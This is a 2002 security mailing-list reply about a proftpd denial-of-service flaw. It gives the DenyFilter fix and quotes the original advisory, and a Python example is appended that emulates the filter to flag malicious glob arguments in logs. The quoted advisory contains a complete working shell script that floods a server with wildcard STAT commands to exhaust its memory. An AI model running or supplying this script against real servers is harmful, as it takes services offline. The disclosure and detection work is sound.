This is so old I can't even find any postings/articles I remember making on
it. Here is one link from early last year:
http://lwn.net/2001/0322/a/proftpd-dos.php3
Check the documentation:
DenyFilter \*.*/
Problem solved.
People should search Google before posting, it's far less embarrassing.
Kurt Seifried, kurt (at) seifried (dot) org [email concealed]
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/
----- Original Message -----
From: "Rob klein Gunnewiek" <rmkleing (at) hio.hen (dot) nl [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <vulnwatch (at) vulnwatch (dot) org [email concealed]>
Sent: Sunday, December 08, 2002 4:53 AM
Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS
> Hello,
>
> proftpd is vulnerable to denial of service similar to the list
> */../*/../*/../*.
>
> #!/bin/sh
> #
> # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> # might work against many other FTP daemons
> # consumes nearly all memory and a lot of CPU
> #
> # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> #
> # 7-dec-02 - detach - www.duho.org
> #
> # use: ./prodos.sh <host> <user> <pass>
> # do this some more to make sure the system eventually dies
>
> cnt=25
> while [ $cnt -gt 0 ] ; do
> ftp -n << EOF&
> o $1
> quote user $2
> quote pass $3
> quote stat /*/*/*/*/*/*/*
> quit
> EOF
> let cnt=cnt-1
> done
> sleep 2
> killall -9 ftp
> echo DONE!
>
> #end
>
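The mitigation Kurt points at is ProFTPD's DenyFilter directive, which applies a regular expression to every command argument and rejects the command when it matches. The following is an added example, not part of the thread and not ProFTPD code: it emulates that check in Python with the exact pattern from the reply (`\*.*/`, a literal `*` followed eventually by a `/`, i.e. a wildcard that spans directory levels) and runs it over a few constructed log lines so a defender can see which of the quoted arguments it would stop. The log format and the command set are assumptions for the illustration.

```python
import re
from collections import Counter

# The pattern cited in the reply for ProFTPD's DenyFilter directive:
# a literal '*' followed by anything and then a '/', which is exactly the
# shape of the arguments in the quoted script ("/*/*/*/*/*/*/*") and in the
# older "*/../*/../*/../*" variant. Not anchored, just as in the directive.
DENY_FILTER = re.compile(r"\*.*/")

# Commands whose argument the server expands as a glob (assumption: a
# representative set; ProFTPD applies DenyFilter to every command).
GLOB_COMMANDS = {"STAT", "LIST", "NLST"}


def is_denied(arg: str, pattern: re.Pattern = DENY_FILTER) -> bool:
    """Emulate DenyFilter: the argument is rejected if the regex matches."""
    return pattern.search(arg) is not None


def scan_ftp_log(lines):
    """Flag log lines whose argument the filter would have rejected.

    Constructed log format (assumption): '<client> <COMMAND> <argument>'.
    Returns a list of (client, COMMAND, argument) tuples.
    """
    hits = []
    for line in lines:
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue
        client, cmd, arg = parts
        if cmd.upper() in GLOB_COMMANDS and is_denied(arg):
            hits.append((client, cmd.upper(), arg))
    return hits


def noisy_clients(hits, threshold: int):
    """Clients with at least `threshold` rejected globs; the quoted script
    fires 25 STAT requests in parallel, so repetition is the tell."""
    counts = Counter(client for client, _, _ in hits)
    return {c: n for c, n in counts.items() if n >= threshold}


# Constructed sample log: two attack-style arguments, three benign ones.
SAMPLE_LOG = """\
192.0.2.10 STAT /*/*/*/*/*/*/*
192.0.2.10 LIST */../*/../*/../*
192.0.2.25 RETR /pub/README
192.0.2.25 NLST /pub/*.txt
192.0.2.30 STAT /
"""
```

Note that the pattern only stops wildcards that cross a directory separator; a single-level glob such as `/pub/*.txt` is still expanded, which is the intended trade-off of this particular filter.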